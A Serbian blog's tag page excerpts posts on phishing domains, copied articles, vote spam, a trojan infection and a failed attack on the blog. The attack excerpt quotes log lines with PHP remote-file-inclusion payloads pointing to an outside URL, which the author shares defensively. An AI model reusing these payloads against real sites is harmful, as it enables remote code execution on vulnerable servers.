Ознака: интернет злоупотребе

Phishing поново јаше

15. 1. 10. Информатичко друштво 0 Коментара

Пре два месеца писао сам о злоупотреби домена facebook.iz.rs за покушај крађе лозинки корисника Фејсбука . Данас је откривен још један такав покушај са доменом city-shop.iz.rs.

Овај домен је регистрован, на њега је постављен неки садржај који даје утисак да се ради о интернет продавници, мада се по садржају види да није активирана. Међутим у позадини, дубоко је закопана страна која симулира PayPal страну за пријаву, намењена за крађу лозинки корисника овог сервиса за плаћање.

Неопрезни интернет корисници, којима су злонамерници намеравали да подмећу ову страну уместо правог PayPal-а не би приметили разлику, уписали би своју лозинку и направили себи велики проблем. […]
[ ... види цео чланак ... ]

После мале паузе – опет ми украдоше чланак

24. 11. 09. Лично 10 Коментара

Недавно сам објавио чланак о геолокационим сервисима који омогућавају да сајтови знају где се налазите, а данас добих „тип“ од посетиоца да је исти чланак видео на форуму Врњачка бања (vrnjackabanjaforum.com) на адреси http://www.vrnjackabanjaforum.com/first/viewtopic.php?f=34&t=240

Проверим, кад оно стварно: ископиран је текст, нешто је чак дописано испод њега али ко не зна, не може да види да то није део оригинала, и чак је текст потписан. Илустрација која иде уз чланак није пренета, али то је вероватно зато што сам забранио линковање слика са непознатих сјатова (погледајте Hotlinking: кад вам други сајтови троше ресурсе), а копирача је вероватно мрзело да слику сними па поставља на форум копију. […]
[ ... види цео чланак ... ]

Web fest спам

4. 11. 09. Информатичко друштво 32 Коментара

Гласајте за мене, гласајте за мене!

Одзвањају ових дана имејл боксови, Фејсбук, твитер, Блогодак, Планета и сви остали начини масовне интернет комуникације од вапаја вебмастера да им се да глас.

И ове године се одржава Веб Фест – маса власника сајтова су се пријавила да учествује на овом великом регионалном фестивалу сајтова.

Како организатори Веб феста нису уважили примедбе са прошлог фестивала да је јавно неконтролисано гласање посетилаца бесмислено, они су то оставили и ове године. И тако су направили праву спам помаму, јер ове године, много жешће него прошле, сваки сајт агитује како зна и уме да добије гласове публике и, неретко, не либећи се ни законом забрањених поступака, као што је на пример, слање спама. […]
[ ... види цео чланак ... ]

Хакерски напад на блог

29. 10. 09. Информатичко друштво 2 Коментара

Данас сам у логу приметио покушаје напада на блог. Напади су сувише наивни и неуспели али ће можда некоме бити интересантно да види. Ево лога једно напада са адресе: 195.146.81.144 (host2.relline.ru)

/redirekcija-putanja-url-rewriti...avan-nacin/comment-page-1%20%20

///?_SERVER[DOCUMENT_ROOT]=http://www.yeshouse.net/column/x.txt????

///?_SERVER[DOCUMENT_ROOT]=http://www.yeshouse.net/column/x.txt????

/redirekcija-putanja-url-rewriti...avan-nacin///?_SERVER[DOCUMENT_ROOT]=http://www.yeshouse.net/column/x.txt????

_SERVERDOCUMENT_ROOT=http://www.yeshouse.net/column/x.txt????

/redirekcija-putanja-url-rewriting-na-jednostavan-nacin///?_SERVER[DOCUMENT_ROOT]=http://www.yeshouse.net/column/x.txt????

///?_SERVER[DOCUMENT_ROOT]=http://www.yeshouse.net/column/x.txt????

/redirekcija-putanja-url-rewriting-na-jednostavan-nacin/comment-page-1///?_SERVER[DOCUMENT_ROOT]=http://www.yeshouse.net/column/x.txt????

/redirekcija-putanja-url-rewriting-na-jednostavan-nacin?_SERVERDOCUMENT_ROOT=http://www.yeshouse.net/column/x.txt????

_SERVERDOCUMENT_ROOT=http://www.yeshouse.net/column/x.txt????

///?_SERVER[DOCUMENT_ROOT]=http://www.yeshouse.net/column/x.txt????

Зар се овај стварно надао да ће овако нешто да прође? Једно три-чеитири године раније би можда имао неку шансу да набаса на какав сајт који је толико бушан да овај напад успе.

Било би занимљиво имати неки додатак који би препознавао овакве покушаје па убијао конекције колико да се не троши проток безвезе. […]
[ ... види цео чланак ... ]

Домаћи случај phishing-а

29. 10. 09. Информатичко друштво 13 Коментара

Не једном су ми замерали зашто инсистирам на јасним писаним правилима везаним за регистрацију бесплaтних .iz.rs домена и зашто сваки регистровани домен пролази ручну проверу. Оптуживан сам чак да све то радим зато да бих задовољавао неку своју сујету и давао себи на важности тако што ћу да одлучујем коме ћу да дозвољавам да региструје домен. Ствар је нажалост банална: када је нешто бесплатно велика је јагма, а нарочито од оних који су склони злоупоребама и криминалу.

Једна од ситуација због којих је проверавање домена неопходно се догодила данас. Данас је регистрован домен facebook.iz.rs (не морате отварати сајт пошто је он већ угашен). […]
[ ... види цео чланак ... ]

Неће мене тројанци – мало сутра

21. 8. 09. Web развој 12 Коментара

virus Дошао је и тај дан да мене смлати тројанац. Ошашавио ме је ко младог мајмуна и још увек не знам шта се догодило.

Синоћ су почели људи да ми пријављују за пар сајтова да им Firefox пријављује да су опасни и не дозвољава приступ. Нисам се изненадио, јер сам недељу дана раније већ открио тројанца који је напао четири сајта које администрирам. Мислио сам да сам ствари довео под контролу, али се испоставило да ми је нешто промакло.

Нов, непознат и опасан

Тројанац који је извршио напад се скоро појавио и већ сам виђао случајеве да су неки сајтови страдали, а и пратио сам шта се са њим дешава. […]
[ ... види цео чланак ... ]